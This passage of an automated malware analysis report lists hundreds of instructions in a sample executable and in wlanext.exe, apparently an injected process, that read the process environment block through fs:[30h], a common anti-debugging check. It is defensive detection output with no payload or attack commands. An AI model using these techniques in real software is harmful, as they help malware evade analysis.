          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01913540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03643B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03643B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03621B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03621B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03642397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0365927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03654A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03654A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03628A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03615210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03633A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03642AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03642ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03634120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03642990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03630050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03630050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03697016 mov eax, dword ptr fs:[00000030h]
